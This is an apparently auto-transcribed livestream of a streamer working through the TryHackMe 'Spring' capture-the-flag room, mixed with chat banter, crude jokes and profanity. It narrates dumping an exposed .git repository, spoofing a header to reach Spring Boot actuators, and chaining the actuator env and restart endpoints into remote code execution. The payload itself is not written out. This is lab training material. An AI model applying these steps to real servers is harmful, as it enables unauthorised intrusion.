All right. You look in there. There we go. Finglui Muguanoff Cthulhu, real yeah. Gognoggle Vatten. Everyone, it is Cthulhu Cthursday, and I want to welcome you here and encourage you to gather and prepare your gognoggles because we're going in today, boys. We're going in today. We're gonna do some spicy TryHackMe this time. I anticipate some nice spicy TryHackMe on this fine Cthulhu Thursday, and the outcome looks fantastic from here already. I can't wait to see what wrinkles we're gonna add to our brains today. How's everybody doing? Welcome, Carlos Artman, Maticus Maximus. Welcome in. Spicy molding, in all probability, yes. Spicy molding. I deeply anticipate a good amount of spicy molding. Let's make sure no Java today. Well, I mean, I don't want to like say that we fear anything. It's just that again, Log4j doesn't fear me under normal doesn't make me afraid under normal circumstances. It's just not terribly interesting to watch a stream about it. And when I'm concerned about, whether my viewers are enjoying stuff, the music is on Quickster. It's just kind of low at this point. When I'm concerned about my viewer, I'm trying to bring you education as well as entertainment. And there's not much of either is going on if I'm just trying different versions of the same exploit over and over again until one actually works. It's just not terribly interesting. It's just not. So, hopefully today, it's not that we fear Log4j. It's just that it doesn't make for good streaming content. I'm scared about the CRTO exam. Still doing the course, but there is so much info. Well, what I will say about the CRTO exam is that there was nothing on the exam that I felt like was not covered in the course. I didn't feel like I was just... How do I put this without giving stuff away? I didn't feel like I was just... I was just straight up not... I was just straight up doing random shit. That wasn't covered in the course. I felt like everything that was tackled in the... that was tackled on the exam was covered in the course. So just be prepared for that. Where can I get that hoodie? This hoodie, I believe, came from probably Redbubble. Probably Redbubble. I don't like Log4j very much. It's just not a fun exploit to exploit. Is it very important and very groundbreaking? And did it have was there a lot surrounding it when it happened? Absolutely. Lots of stuff. Lots of that's a very dangerous exploit, but dangerous doesn't necessarily mean interesting, and Log4j isn't terribly interesting to exploit. I think we have just a little bit. I think we have just a little bit of news today. Just some happy news. Some happy news. Get ready. Let me just get it open in a incognito. Crypto entrepreneur Sina Estavi bought Twitter founder Jack Dorsey's first ever tweet as an NFT for $2.9 million last year. He listed it for sale again at $48 million last week, and it ended with a top bid of only $280. So it's just a happy, wonderful story of crypto shills and stonks. Okay, it's just a wonderful stonks story. We're experiencing it's always good when the crypto shills get BTFO'd. It really warms my heart when that happens. It's just wonderful. Just wonderful. We do love it when the crypto shills get BTFO, don't we, folks? We do love that. Do love that on this stream. So there you go. If you want to read the story, it's here. I'll put the link in chat. Pledged 50% of its proceeds to charity. Wow, that's $140. I'm sure that charity be super happy. Wow, well, the lowest bid was $6. Jeez, what a joke. Oh my god, this is the visionary mind behind Crypto Land? Is this the visionary mind behind Epstein Island? Or Crypto Epstein Island? Holy shit, I did not even know that. I did not even know that. Who knew that the guy who thought up Crypto Land would have, if you don't know what Crypto Land is, that's a fun little internet rabbit hole to go down. I highly recommend YouTube searching that at some point, and at least viewing the video. They have a whole animated video, which is worth more than this guy's NFT on Jack Dorsey's first tweet, apparently. The world's first ever tweet. Jesus fucking Christ. $280. This is why you don't invest in NFTs, kids, okay? You're gambling, and you're not even... You're more likely to win if you just go to Vegas and throw all your money down. Oh my... on the roulette board. What a time to be alive, indeed. Okay. Let's do some TryHackMe. Let's get started. I want to get started. Now, this is Cthulhu Thursday, so we are going to be taking on some more challenging machines today. Let me get logged in. My goodness. How's everybody's Thursday going? Mine's been real slow, but somehow I'm still really tired. Isn't that always the way it goes? All right, here's what we're working with. What are we taking on? We have a Windows. We never actually did retro. Let's start a poll. And different CTF sounds interesting for people who want something a little bit more CTF-like, a little bit more puzzly and fun. Maybe a crop top. You don't get the crop top for more than one day. The deal was 1 day, and I'll have to come up with some new incentive for the next if you laugh, you lose, I should say. Didn't we do this one? I could swear we've done this one. I guess not. We'll put for business reasons. I'll mark the ones that are Windows. Misguided Ghosts sounds fun. And, let's see. Some stuff we haven't done. Can you hack your way into a Hello World application? That seems interesting. We'll do spring as well. There we go. Get the poll going. Oh, yes, Stream Raiders. Let's do that, too. Let's get that started. I'm more and more progressing through TryHackMe. When would you suggest I can transition to Hack the Box? Like right now. Right now. People are far too afraid of Hack the Box. There's nothing to be afraid of. It's just more TryHackMe. Hack the Box's machines tend to be a little bit more themed. And a little bit less realistic in my opinion. But they're still great learning resources. Mende and Michael Myers. Michael Myers. How did it take so long for me to say that correctly? Welcome to the stream. Thanks for the follows. I need to get some water. Get your votes in. I'm going to get some water. I'll be right back. Alrighty, get some water. Got people yelling at me in text messages again because they don't know my life and they don't trust my life choices. Are you gonna start my very first RTO project next week? Got any tips? Been doing mostly. What do you mean by your first RTO project? You mean like your first client that you're on a red team for, or what do you mean by that, Sylvestra? Can anyone explain how ranks on Hack the Box work, which are required to do those set boxes like Dante? I didn't know you needed a certain rank to do Dante, but the way ranks work is you get points by doing active challenges, as in boxes that have come out recently, and challenges that have come out recently. And after a while, all those boxes and challenges retire and are replaced by other challenges. If a box that you've done is retired, you lose the points, but you never go down in rank. If you accrue enough points to go up in rank, you do go up. If you get enough points to go up in rank, you go up in rank, and then you can never lose that rank. You don't need a certain rank? I never heard that. Oh, wait, which one won? Shit, I didn't see the poll. Spring one? Okay, let's do spring. Join the room. We'll start the machine. Looks like we're looking for a foothold.txt, a user.txt, and a root.txt. And I did not even start my VM yet, so give me a minute. Starting this up. What's the purple VS versus code symbol you have? Oh, you mean down here? This? This is Visual Studio. There's Visual Studio and there's Visual Studio Code. Different applications. And I have both of them installed. Secretly is wearing the crop top under his hoodie. I am not wearing the crop top under the hoodie. I think it's... I took it off right after the stream, and I think it's sitting over on the floor down here somewhere. Alrighty, let's make this bigger. Let's change the current challenge. We're doing TryHackMe's Spring. Okay. Did the ears grow on you? They did not. They did not. It was actually kind of uncomfortable to wear them with the headset. Starting this up. I need to rebuild my Kali machine. My plan is, after this stream, to rebuild my Kali machine. I'm badly overdue for rebuilding my Kali machine. How do you build a Kali machine? You download the ISO from the website and just build a new virtual machine. This one is... I like to do it every so often because Kali becomes bloated after a while and it slows down. And I haven't done it for a while with this one because it's the one I use for streams. So I'm probably going to start that after the stream today. Okay, don't know what we're in for here today. I hope we get some interesting dark rituals to undertake. What madness awaits us, chat? What malding will there be? Can it please not be Java? Okay, let's start with the ye old Nmap scan. We start with the humble beginnings of an Nmap scan. Get started there. Been a big fan of Kali bare metal, and even more stoked to show that it now supports snapshots. Like, I install it on VirtualBox. I wouldn't put Kali on bare metal personally. Not that like it's gonna break your machine or anything. Again, I like to rebuild my Kali after a while every time. Have I not picked a battle? I did not pick a battle. Let's do this one. It's a Java buffer overflow. How is it a buffer overflow in Java? I assume Java manages memory. Alrighty. What do we have? Only port 22 is open according to our first Nmap scan. We'll start with we'll do an all port scan as well. Just gonna do some happy little hacks today. Just some happy little hacks today. Got to scan all the ports. Open SSH. This is probably Ubuntu. What, it's Xennial? What do we think this probably is? Let's find out.
A hunter must hunt.
Let's just do Ubuntu Launchpad. Bionic, actually. It's Bionic. Chad B. New bringing Husky hacks into the passionate club of cephalopod enthusiasts. Welcome. Welcome, welcome, Husky. Thank you, Chad, as always. Vicioso and is Zato? I think Zato1. Thank you for the follow. We're just waiting. There's got to be more than just port 22 open. SSH usually isn't vulnerable unless you have credentials of some kind. Let's do a UDP scan as well, just in case. We got to do it verbose mode. See if we got anything on the UDP side. W Main, thank you for the follow. Cthulhu fought to you, my friend. Well, I should have done the verbose flag on the top. Let's just do it again, but we'll do it with the TAC V option. So we get whatever flag. Port 80 is open now. Perhaps the box wasn't fully open before. Quite odd. We have 80 and 443 are both open here. So we do need to find out if those are the same web server. 1010 25188. It looks like port 80 just redirects us to the HTTP to port 443. Pretty common these days. Hello World. So this must be what they meant by a Hello World application. We just have Hello World. So we're going to want to do GoBuster on that for obvious reasons. Not a whole lot to look at otherwise. Let's just leave the file extensions off. Status code that... Can exclude that status code. Oh, maybe we need to do it with SSL. We need to do it with SSL. Well, we will need to add the TAC-K option because it's a self-signed certificate. There we go. So it's port 80 is just redirecting to HTTPS. So GoBuster is getting redirection. It looks like we have overloaded this application with requests. Let's do 20 threads instead. Okay. Inspect robots.txt. We should check out robots.txt really quickly, yes. We get a 404. Interestingly, we do get... This almost looks like the Tomcat thing, just without the rest of the... content that's normally on that page. Neen Pone bringing us 5 new cult initiates. Delt Tree, Van Koy LD, Dat Ban Jan Dude, Dat Bajan Dude, Jelly, and Got Makillas. Welcome to the All Has Red Team, my friends. Thanks for supporting the stream. Jelly with the 100 Tiggle biddies. Thank you so much for your continued support of the stream. All right, we're just in that awkward scanning phase, my friends. We have a sources page. How interesting. We do get a 302 redirect. Sources. So we probably want to go, but there's also a logout. So sources reminds me of it's always good to know the limitations of your tools, and specifically, I like to start a GoBuster with this word list, but it's missing some stuff, some words that are really, really common, and that I don't really understand why it's missing. Honestly, I should just edit the word list myself. Does anybody know one of the most important words in particular to look for on a web server that is not contained in this word list? The directory sources reminds me of it. Anybody have any ideas? Come on, man. Interactive chat. Let's go. Git. .git. .git is not inside of this. So if you have, for example, a .git directory in the web root, maybe we can look in the sources. We get a 404. The point is, there could have been a .git, okay? There could have been a .git directory, okay? Oh, admin is in there, but .git is not. If you it looks like I kind of want to look inside of sources. Let's do this again, but with sources instead. /new. Well, we're getting 302 redirects. Technique, good to have you. The Irish Prince, thanks for the follow. We have sources new. I'm going to keep just going deeper. This might be a case where we might want Ferox Buster. I know people are, their blood is curdling listening to, like, at the words that just came out of my mouth, like, using Ferox Buster. But I think we might want to actually use Ferox Buster. Oh, is that how you add text to a file in Linux, Neenpone? Thank you for cluing me in. My goodness, I had no idea how to add text to a file in Linux, Neenpone. Everybody write that down.
The magic word. Please! God damn it! Hate this hacker crap. Calling that
fucking free malding without redeeming malding, it's a win. It's easy enough to trigger me. We're gonna try Ferox Buster on this. I'm not a huge fan of Ferox Buster, as many of you know. But in this case, I think Ferox Buster would be useful. Alright, how do we use this piece of garbage again? Did I say piece of garbage? I need you, Ferox Buster. You're my only hope. Attack you. It's basically the same as Go Buster, isn't it? Okay, it's basically the same as Go Buster. Ferox Buster. Attack you. We're not going to give it a word list. I'm sure it has a default word list. I'm just going to let it use its default word list for right now. Let's do in the sources directory again, because that was the only one we found. Sources. We'll just do it. We'll do the whole thing. That's the whole point of Ferox Buster, right? Attack K for disable SSL certificate verification. Okay. It found a sources directory. Sources new. Is Git in here? I'm curious if Git's in there. Let's find out. It's grep and then patterns, which is .git, and then the file. It is not. Jesus fucking Christ. Why? Alright, fine. We'll even copy Neenpone's code. Hang on. We're doing it. Ready, chat? We're gonna copy Neenpone's code from the chat because I don't know how to insert files into text into files. Neenpone, what do I do? I get permission denied. What happened? Doesn't work. Neenpone. What the fuck? Why do I ever listen to chat? Why do I listen to chat? Chat, it never works. Just sudo it. What does that even mean, Neenpone? You have to explain everything to me. Please explain everything to me, Needpone. Listen, Maticus Maximus! I'm talking to your brother. Sit down and shut up, or I will turn this stream around. Fucking Needpone. Okay, wait, I wasn't expecting that. Oh, it's probably because it's open, because of Ferox Buster's reading it, right? I did not expect this. Well, we're still getting permission denied. Oh, you know what it probably is? It's probably... Needpone's code is probably dog shit. As I expected. We still get permission denied. Oh, .text. I am missing the file extension. I've copied it from Needpone. Did Needpone forget the file extension? He did! Fuck you, Needpone! You forgot the file extension! Stop lolling! Stop it! You know what? That's an ad. That's an ad. We're trying a new thing on stream. Whenever chat pisses me off, it's an ad. Yeah, there you go. What the hell? Actually, what is happening here? What is going on? Why am I getting permission denied?
That still isn't going to work and I'm laughing in ad block.
Shut up, Oreo Bite! Fucking Oreo Bite. There we go, it worked. Get fucked. Fucking Needpone. There we go. Doc gets in there now. Good work, team. We did it. We have the technology now. So you're punishing Nod subs for pissing you off. No, I'm punishing chat for being dumb. Listen, Maticus! I already told you I will turn this stream around! Chris Nova just came in, and it's very embarrassing that I'm yelling at my chat when we're being raided. Shut up, Chris Nova! Well, thank you so much. Don't shut up, Chris Nova. You're doing great. Thank you so much. Thank you so much, Chris Nova. We're yelling at Maticus Maximus. Maticus Maximus is, chat is unruly today, okay? I had to knock chat down a peg. Oreo Bite, thanks for 100 Tiggle Bitties, even though you're taunting me. Layman, thank you for the follow. Layman, thank you for the follow. Fury91, thanks for the 2 months. Welcome back to the All House Red Team. Ghost Mars and Nubbins. Welcome. Thank you for the follows. If you want to knock me down a peg, you better bring a ladder. That one stings, Maticus Maximus. Actually, it doesn't. I am a 6-foot-tall Giga Chad. Oh my god, we're just getting nothing, aren't we?
Must hunt.
There's legitimately just nothing. Run Durbuster? What do you mean run Durbuster? What good is that going to do? Jiffaram with the 5 new cult initiates: Orlin the Mage, B2 Prismo, PRZ Emo, MC, Embargo DC, and Snarred Muggins. Welcome to the All Has Red Team, my friend. Thanks for supporting the stream. 5-5, I heard. These are fake. This is fake news. Okay, how long am I going to have to wait before some fucking directory shows up here? It's probably not even .git. We already saw that .git doesn't exist either. Maybe it's in .new.git? We forgot. We didn't check that. Why is it so slow? Oh, because Ferox Buster is running. How long do we have before Stream Raiders? We'll give it a minute. This box is all about scanning? Well, then why did you guys pick it for me? Oh my god, you guys are trying to, like... You guys, at this point, it's like you guys are trying to make me mauled. Like, you're trying to make me mauled on purpose. Did we view the HTML source? We did. We looked at robots.txt. Maybe you need a new image on the VM? What do you mean by that? Sacco Coder, thank you for the follow. I figured you've learned by now not to let chat pick the box. I should. I should have learned that. I did not. That is fair. I definitely should have learned that. We still get 404 not found, huh? Get the cat, it will make you more peaceful. She's sleeping on my bed at the moment, I believe. The last I saw, anyway. Losing some points? How am I losing? What points am I losing? I'm not losing any points. This is what chat chose for me. This is the... We tried login. Or we tried log out. Login would have been seen. We would have seen a login page. That's one of the first entries. Is there a space? Why would there be a space? I don't think so. There's a dot. It's .git. I'm not saying there even is a Git directory. I'm just saying when I saw the directory sources, that's what I thought of. It reminded me that .git is not in this word list. Well, it is now. After Neen Pone generously informed me on how to add text to files in Linux. Technique with the 69 Tiggle biddies.
Gigaman let al 4Z top gay poggers.
Listen, if you're gonna taunt me by giving me money, listen, you can taunt me all you want as long as you're giving me money. As long as you're giving me money, you can taunt me all you want. Include file extensions? It's gonna take even longer. We get sources new. Public static void. God, I hate Java. Ugh. I hate languages that force everything to be a class. You have to have a class declared for everything. Well, I don't hate C#, but I don't like Java. You know what, Chad? I think I'm gonna go see that movie, Everything, Everywhere, All at Once. Tomorrow? I think I'm gonna go see that. And the only reason I'm bringing it up because I'm thinking about it now while all these fucking scans run. It's an A24 movie, so there's no way it can't be good. Oh, I'm sure it's good, Orland the Mage. It's from A24. A24 doesn't miss, okay? You don't like A24 never doesn't miss, okay? I haven't seen reviews or anything. When I try not to look at reviews prior to going to see a movie. But if there's one studio in Hollywood you can rely on to produce some fucking bangers, it's A24. A24 doesn't have a single movie that I can think of that isn't a fucking banger. It's just that they have a type, and that type is psychological horror. And I'm wondering, I saw the trailer for Everything Everywhere All at Once, and I was like, this looks like a comedy, almost action movie. Where does the psychological horror come in? What have they made? Again, it's usually psychological horror. If you enjoy psychological horror, the chances are you've seen an A24 movie in the last several years, because the best ones have all been from A24. Some examples would be The Witch, Hereditary, Midsommar. More recently, The Green Knight. The Green Knight was awesome. The Green Knight, what else? Well, my point is that A24 fucking slaps. Ex Machina was A24? Wait, was it really? Was Ex Machina A24? Ex Machina fucking slaps. It is A24. Of course it is. Of course it is. A24 never doesn't fucking never misses, okay? If there's and Helen of Tor knows this because I bang on about A24 all the fucking time, but they never fuck up. They're always on the ball, okay? So I think I'm probably going to go see Everything Everywhere All at Once tomorrow. And I'll let you guys know how it is. God, we really just don't have anything, do we? Alone or with a date? I'm going alone. I go to movies alone all the time. What I don't understand this. I honestly don't understand this stigma of going to the movies alone. Like, there's nothing wrong with going to the movies alone. Like, in fact, it's even better that way, honestly. Like, why would you even go with someone else? You're not going to be talking to them unless you're going to the bar afterwards. Midsommar fucking slaps. I'm about to go see Batman alone. You should see Batman. You should see Sonic. Those are good if you like Sonic the Hedgehog. There's nothing hidden. No, there's just nothing. There's just nothing here. It's going really slow because Ferox Buster is pounding it. Giggity.
Giggity, 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 goo. Giggity, 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 goo. Stick around.
We're trying out some giggities. Run Nikto? I guess we could run Nikto. I doubt it's gonna... I mean, it's gonna go super slow because of Ferox Buster. Let's just kill that. It's going super, super slow. Did we bring the web page server down, I wonder? Because this is my concern with Ferox Buster. It does tend to bring the web server down. We had sources. We tried .git in the sources directory. Did we try it in the new directory? We get a 404. But we get a 404 for all of these. Is it redirecting us? Ref's head? Still nothing. Let me look in one of my .git directories to look for a file that's always there. I thought it was head, but before I move on, it's going to be in my projects directory. Nimdev. Here we go. Yeah, refs. It's just the head. I'm not thinking of refs. I'm just thinking of git head. You want to, there's even a, see, there is a .git directory. Okay. All right. Okay. So again, the way to remember this is every time you have if you want to check for a .git directory, and the only reason I thought is because of sources. So thank God this came to mind. But every time you think every time you want to look for a .git directory, you want to look for the head file. So you just want to git head. You want to git head. Okay? There you go. All right, so there is a .git directory here. So do we have git dumper? Or do we have a, it's not GMSA, git tools. Perfect. Dumper. You use git scanner at all? I'm not familiar with that, but I'm quite sure I'm sure it's good. All right, let's do this. Let's. And the destination directory is going to be home. It's red. TryHackMe spring. Destination folder does not exist. What the fuck do you mean? How does it not exist? It says destination folder does not exist. Oh, you mean the .git directory in there. My bad. Alright. Alright, we're downloading. We're dumping this Git repo. So this is pretty common to see. It's pretty common to see Git repos exposed on the open internet. It's not the same without fox ears. Well, we'll have to do if you laugh, you lose. Again. I know the other streamers like it. Getting head is almost always a good idea. It is almost always a good idea. That is factual. These are factual things that are being said in chat here for once. All right, so we do have some. We've got a fat dumper in this .git directory. So here we are. So things are contained like so if you don't know what Git is version control software that's widely used across the software development industry. It's used to maintain a log. It's basically a way of logging changes that have been made to your code or your repository over time. Such that if you have problems, you can revert back to previous versions of the code. We did this on the log4shell thing because it turned out that the most recent version of the exploit kit we were using, which was on GitHub, was not working for us. So instead, at Mr. Robot's urging, we reverted back to a previous commit of that same repo, and then it worked. So that's what Git's good for. Keeping track of changes you've made and reverting back to previous versions of the code. So what it's not good for is being exposed on production web servers. You do see it fairly often that it's accidentally exposed, especially on development servers internally. And if you do that, there are tools that exist that can basically dump all previous commits of this code. So we'll play with that here in just a second. Let's do Stream Raiders really quickly. I wish I could use Git to revert changes on my life. Well, the good news is that life goes on, my friend. You can make it better. You might not be able to revert back to a previous version of yourself, but you can always work towards that on your own time. Maticus Maximus and Just a Guy with the most kills and most assists. Pushing creds to Git on accident. That's also a very common thing to find. Credentials in Git repositories. SolarWinds 123 as the classic. The classic. All right, so let's do git log. Okay, so,
That fine addition to my collection.
so we probably want to... This is the most recent commit. Oh, no. This is the most recent commit. This one is the one we want to revert to. This is where we're at, and that's why it's marked headmaster. We want to revert back to this. How do I revert to a previous commit again in Git? Is it Git reset? Yeah, it's Git reset. And it's Git revert. Okay, Git reset. Like that. So how do we actually view the files? Oh, it's Git checkout. Yeah. Okay. Can I see? How do I actually see the files now? Git log. Yeah. So we're back at this commit now, but how can we actually see the files? The files are changed now, but we don't have the files in here. The files are not in this directory. I always forget how Git works. Get good at Git? Yeah, I know. I need to get good. That's fair. I don't often have to restore to a previous commit, and I always end up having to look it up. Ugh. Git supplies the reset command. If we want to reset master to point to a commit to, we could use one of the git reset.
A hunter
okay.
must hunt.
Options to update the oval part of the local environment. Git diff would have been good, yeah. Of course, it's fucking Java. I should have known. How is it? This is an average amount of code to type hello world in Java. This is how you do hello world in Java. This is the amount of code that's required. Destroy worlds, good to see you. Shin Ryzen with the 10 months. Welcome back to the All Has Red Team, my friend. Thanks for supporting the stream. I think you skipped a password. I very probably did. They said something about a password. Pass. Here we go. John Smith. Is it that easy? Okay, I'm just getting some notes spun up. Hang on a second. This is Spring. John Smith. And then the password is I don't want to go. So we can try that with SSH here in a second. Are there any others? No. Okay. Let's check that out. SSH, John Smith. 1010 251 88. Public key. Damn it. So what's the point of the password then? If it gives us a password, but what's the point of it? Well, we do see references to the Spring framework, so we can see why that's what it's called. That's what it's called. Oh! Reset the commit. It's right here on the fucking screen. To the commit being pointed to in the repository, populate the working directory with the contents of the commit and reset the staging area. Okay, so I almost had it right. So it's git reset, but it's tac hard. There we go. Pog. We have all of these nice files in here now. Oh my god. I gotta write that. I gotta write that down. Git reset hard commit. Yes, we're resetting very hard. Yes.
Giggity, giggity, giggity. All right.
All right. There. So I'm just gonna write that down. I'll put it in my cheat sheet later. I need to have a Git section of the cheat sheet because I forget how to do things in Git all the time. So we see build.gradle. This is just some Maven shit. It's using the Spring framework, I'm noting. Okay, let's go into Gradle. Application.java is probably what we're looking at. Source main Java. Spring application.java. That's probably what we want to look at. God, I hate Java. Okay, here we go. All right, all of this for Hello World. Yep, great. Java's so good. It's so good. Look how it's so verbose. Don't we love it? Don't we love it, folks? See, I did say it was Tomcat. Did I not say that the 404 looked like Tomcat? Like, the 404 page... It looks like the top of the Tomcat page. I thought that just was a Java thing, but it looks like it's using some aspects of Tomcat. How are you today? I have a little bit of a headache, Destroy Worlds, but I'm hanging in there. If Helen of Tor is listening, I feel perfect. I feel completely ideal. Literally, I've never felt better in my entire life. If Helen of Tor is here, that is the fact of the matter. But if Helen of Tor is not here, I have a headache. Just a little headache, a little baby size headache. Why are you doubting yourself so much? I don't know. I don't mean to doubt myself. I just don't often see 404 status codes that look like that. When I see this, I automatically think Tomcat, but I don't really, Java scares me. And I see that you guys picked this because it is Java, and you knew I would hate it and there would be molding. So, yeah. So, I'm going to start Googling for, like, vulnerabilities in the Spring. Spring... Java Spring Vulnerability. So we're supposed to use Spring for Shell, I'm assuming? Is this a recent box? When did this box come out? I'm checking. No, it's over... We're not supposed to use Spring for Shell. It's 643 days old. It's almost 2 years old. It is not... Spring for Shell is recent. Yeah. So this must be some old vulnerability in Java. Well, we could use Spring for Shell, but I'm not going to. I don't even know how Spring for Shell works. I haven't looked into it. Let's just have a look at the code. I'm sure maybe we're supposed to reverse engineer the code somehow. Hello world. Redirect connector. This is what is redirecting us to port 443 when we hit port 80. That's not anything to be interested in. So we're doing Tomcat stuff. Security constraint. Use HTTP only. What's down here? Actuator. Wildcard addresses. Has IP address. This is an internal. Is this some other endpoint? Actuator? But you can only access it if you're coming from from an IP address here. Huh. What is an actuator? We're learning about stuff. What is an actuator? No. What? No. Stop. Production ready features. Monitoring the app. Understanding traffic. Expose operational information about the running application. Help, metrics, info dump. That seems sensitive. So what we could try and do... It looks like this is probably sensitive. And the rest of this looks very boring, like normal HTTP handler stuff. This is the only part that looks interesting to me. So I'm wondering, let's start up Burp. Burp Suite is also written in Java, so we're going to use the Java to destroy the Java, okay? It's not Spring for Shell. The box is 2 years old. Unless the creator of the Spring for Shell person knew of Spring for Shell. The creator of this box knew of Spring for Shell for 2 fucking years. Remote code execution in 3 acts. Chaining exposed actuators. Now this seems more accurate. This seems more my deal. It's not the correct cookie. The correct, we could try changing some headers to make it seem like we're coming from somewhere else. Actuator E and V. So we can see environment variables, I would imagine. Easily monitor and manage all endpoints apart from health and info are considered sensitive and secured by default. This security is often disabled by application developers. Includes get and post methods to retrieve and set the environment variables. So this is the final payload, and now they're explaining how they got there. Well, I like this a lot. Nice. Thank you, whoever posted this in chat. Subterminal, thank you so much. That, I think, is what we need to do. That looks like exactly what we're looking for. So we're going to need to, at this point, intercept by burp. Intercept through burp. I gotta disable my socks proxy. And we will send a request. Actuator E and V. We get a 403 forbidden. Okay. So let's go back to this. Send this to repeater. And we can... We should get a 403. We do. What if we add an X forwarded 4? Uh, 172.16. What was the IP address? Or the subnet? .0.0/24. .0.1. We still get a 403, so that's not going to work. And I'm all out of ideas. X forwarded host? Nope. No joy there. What was that username and password for? Grep tac R John Smith? It was in resources. I just want to see what this password was for. This password must be for something. It's not for... If it's not for... What is this? Class path dummy cert. This is a self-signed certificate. Dummy key store password 123. That is a password. We can put that in. That's the password for the cert, the PEM. Oh yeah, we can try all of those. Thank you, Tiberius. Let's try those. I was gonna Google that, but I'm really curious about these credentials. .403. X forwarded 4. X remote IP. Still get 403s. X remote ADDR. Nope. Could also try changing the host. We could try... I mean, this is... We could try that, yeah. Still get 403s. Yeah, nothing there. Are there any others? Are there like Java specific ones? Is there like one specific to Spring? Security username John Smith, and I don't want to go. Oh, it's waiting for burp. My bad. Good call. Thank you. Let's just turn intercept off. See if there are any we missed. Usually it's forwarded for identifying the originating IP address. Forwarded host? Did we try forwarded host? Nope. Forwarded proto. We're just trying stuff. We get a 302. Pog? Pog. Wait a minute. Did we... Let's just intercept it and see if we actually get something. Just had to try a whole bunch of headers, it looks like. We still get a 403. We just got... we still get a 403. False alarm, chat. False alarm. Like, just give it a couple of minutes. The erection will go down, okay? If the erection is present longer than 4 hours, then you contact a medical professional. What are these credentials? Spring security user.name. What the fuck is this? I really want to know what this is about. I'll say this for Java, it's at least readable. Like, I can read and understand. What the fuck is that? Remote IP header? Did they just make an arbitrary header? I'm not mad. I'm not mad. I'm not mad. TryHackMe. I'm not mad at you. I'm not mad. Is that just an arbitrary fucking header? I should have known. I should have known. So, what I was actually trying to do is point out that at least Java was readable. Like, I can understand what this is doing. Like, with object-oriented programming and these are properties of objects. I can understand what's happening here. And I just happened to look directly at this line. And it says server.tomcat.remote IP header. And then it's just this random garbage. I know it's not Java, but it's a config file for Java, so it's kind of written in the same verbosity as Real. I understand this isn't actual Java code. It's just variables being set. But these are objects. They're referring to properties of objects. And it turns out that you need this very specific header set. I am Miracle, I'm not molding! You should have an erection right now because we now can access the private part of the app. What are you complaining about? I will turn this erection right around, I am Miracle. I don't even have your mom here to work it off for me. Manicus Maximus, how many times have you told me to stop malding just today? How many times? Are you just refunding yourself? Are you like redeeming these and then refunding yourself every single time just so you can do it again? This is an abuse of your mod privileges, sir. I do not condone this use of your mod privileges. Okay, what the fuck is happening here? Okay, so we can see environment variables. Now do we want to do this exploit? I'm glad we saw this because I was going down the rabbit hole of trying to figure out what the fuck this is. And I still kind of want to know. I want to know what this is. What are these credentials for? Is it just for Tomcat? I mean, it looks like it's supposed to be... Can you please activate, install the closed caption? Is there closed captioning on Twitch? Aaron Fonseca, thank you for the follow. Cthulhu fought into you, my friend. Let's do Stream Raiders. Yes, there is closed captioning on Twitch. How do I activate it? Does anybody know how to activate it? I will activate it. Settings. Stream. I should probably turn that mature content thing to on. Hang on. I'm trying to figure out how to turn on the closed captioning. 1 second. I did not know this was an option. Twitch closed captions. Is it an extension? I'll need to transmit caption files in an accepted format embedded on the stream. It looks like it isn't an automated feature. I'll look into it, though. I don't want to do it right here on the stream, but I'll look into it. What was that? Subterminal sent us that spectacular blog post that looks like exactly what we want. Okay. So we can access these actuators now. Right here. Is there anything sensitive in these? We see the Java version. Oh, stream. I'm sorry. Sorry, yeah, sorry. Listen, my Thosts.
hunter must hunt.
My Thosts, if that is your
Alpha
real
Z
name.
happy, Alpha Z
I just
happy,
changed
Alpha
it.
Z
You can
happy.
see it now. Thank you, Cheeto Pandito, for the 15 months. Welcome back to the All Has Red Team. Vinkle, thank you for the follow. Okay. The pseudo user is root. Is there a password? It looks like the application is running as root.
A hunter must hunt.
What is... We have another password here. This is that... Oh, no, this is that password we saw. This is the dummy key store password was the incorrect one. This is the correct password for the key store. So we have another... We have yet another fine addition to our collection there.
A fine addition to my collection.
I don't know if that'll be useful. We don't really care about their certificate unless we were going to spoof them. And we still don't even have access to their certificate. We see that Spring Security user password. That's that. The username is John Smith. It doesn't look like... There's plenty of fine additions to our collection here. But unfortunately, SSH is configured to only allow SSH keys. And not passwords. So we're going to have to get code execution through this somehow. Which is where this comes in. This is what Spring Terminal gave us in chat. We're going to take a look at this. So this is the final payload post actuator ENV. You know what? Let's just fucking freeball it. You guys ready? You guys ready to freeball it? We're letting it ride. Letting it ride. Change request method. We paste this in here. I want it to ping me. If config ton 0 10.2.54.81. I missed my .69 IP address. Nice. My IP address was very nice. So we'll ping taxi 3 10.2.54.81. So let's sudo tcp dumptech iton 0 icmp. And let's send. Alas, it did not work. We get a 415 unsupported media type. So that did not work like I'd hoped. Spring.datasource.hikari. It's not form encoded? Oh, good call. Yeah, thank you. Is it going to be application JSON? Most of the time when that kind of shit happens, it's because the content type is wrong. Well, we get a 200. We get a 200. And it looks like we're doing some squeal injection. Or not, maybe not injection, but this is a squeal command. Get input stream. Is that our IP address? 10.2.54.81? Yeah, that is our IP address. 10.2.54.81. Alas and alack. It did not work as I'd hoped. Well, let's make sure we're doing it correctly. Create alias command. Whenever a new database connection is created, the value of Spring data source Hikari connection test query will be executed as a SQL query first. There are two ways, either by restarting the app. Oh, you have to trigger it. So we've set it, and now we have to trigger it. See, this is why we read the blog posts, okay? Listen, this is why this was a test, chat. This was a test to see if chat would actually read the blog post and not just fire the exploit at the beginning and then scratch our heads and wonder why it doesn't work. No read, only copy. How do I trigger it then? By exposing actuator restart? Do I just set a GET request to that? Can I just use a GET request to actuator restart? Oh, we get a 403 forbidden again because... What is happening? Oh my god. What is... Are you kidding me with this? Okay, hang on a second.
Hunter must hunt.
We gotta add a scope here. This is obnoxious. There we go. So we have to add this arbitrary HTTP header. You still don't get any pings, but I'm noting that it is hanging. I'm noting that it's hanging. Or maybe it's not hanging. Method not allowed. Does it need to be a post request then? Maybe it needs to be a post request. Let's go to actuator restart. Now let's get rid of this. It is hanging. I'm noting that it's hanging. It says post in the blog, does it? It's hanging as if it's trying to do something. Like trying to ping us. Mr. Streamer, learn HTTP. What am I missing? What does there need to be? It says content length 0. What's the problem? I knew that, chat. Stop it, I am Listen, I don't want to... We do have a remote code execution, by the way, though. Listen! Stop! Chat is going in hard today. I don't approve of this. I forgot a single new line at the end of this. Listen, chat. And look, I like how literally every single time, like every single person in chat is like, I would never have missed that. I am the best hacker in the universe. Are you fucking kidding me? No read, only copy. I would never, because I know H. Fuck you, Tiberius. Fucking This motherfucker doesn't even come to FootCon and thinks he can just Skype in with the takes of his fucking Twitter followers on the on who comprises a content creator. On who comprises a content creator. Copy paste Unga Bunga. I said I was trying to teach you guys to read the blog post. So 